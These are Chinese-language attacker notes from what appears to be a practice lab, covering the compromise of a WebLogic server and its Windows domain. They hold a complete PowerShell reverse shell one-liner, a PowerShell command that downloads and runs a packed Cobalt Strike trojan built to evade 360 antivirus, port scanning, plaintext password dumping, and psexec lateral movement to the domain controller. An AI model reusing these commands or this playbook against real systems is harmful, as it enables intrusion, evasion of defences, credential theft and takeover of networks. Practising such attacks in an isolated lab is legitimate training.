配置
仅主机模式
nat
打开WEB
密码1qaz@WSX
提示密码过期修改admiN@123
登陆之后打开
C:\Oracle\Middleware\user_projects\domains\base_domain\bin
以管理员身份运行startweblogic
查看192.168.111.80:7001
打靶
反弹shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.111.0', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
tasklist /svc
有360
上线cs加壳木马
python启动http临时服务
在反弹的shell上执行以下命令 下载
powershell iex(new-object system.net.webclient).downloadfile('http://192.168.111.0:8000/cs-k.exe','c:\programdata\cs-k.exe')卡死了再反弹一下
./cs-k.exe
插件提权
shell ipconfig /all
portscan 10.10.10.80/24 1-1024,3389,5000-6000 arp 1024 /扫描端口
开放445端口
尝试横移
建立smb监听
抓取明文密码
横移域控10,使用psexec-64
201,使用psexec
横移成功
